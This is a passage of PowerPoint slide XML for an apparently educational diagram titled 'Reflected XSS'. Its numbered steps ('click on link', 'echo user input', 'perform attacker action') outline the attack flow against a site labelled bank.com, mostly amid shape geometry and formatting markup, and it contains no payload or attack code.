                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="2835275"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2336296" y="2842577"/>
            <a:ext cx="164465" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4724400"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="73025" y="4731702"/>
            <a:ext cx="2123440" cy="1787525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="447040">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1860"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>execute script  embedded in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>input  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>as though server  meant us to run</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1892300" y="5149850"/>
            <a:ext cx="2740025" cy="989330"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2740025" h="989329">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2739988" y="989099"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4576864" y="6083524"/>
            <a:ext cx="122530" cy="89026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="3131668" y="4324147"/>
            <a:ext cx="1325052" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>click </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-225" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>link</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="2417361" y="4699080"/>
            <a:ext cx="1828745" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-157" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="object 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="2136338" y="5296058"/>
            <a:ext cx="2634821" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="5555" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>perform </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-225" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="object 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752714" y="4724514"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="object 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752714" y="4724514"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="object 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2093363" y="4290014"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="object 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="1817138" y="4778964"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="object 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7159625" y="6278372"/>
            <a:ext cx="918210" cy="269240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="408000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Title 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65977057-21F9-F741-985E-99827EA523E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BF34CCF-1E9C-944C-AD74-B746EEA9A5AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6397625" y="3001772"/>
            <a:ext cx="1448435" cy="259045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
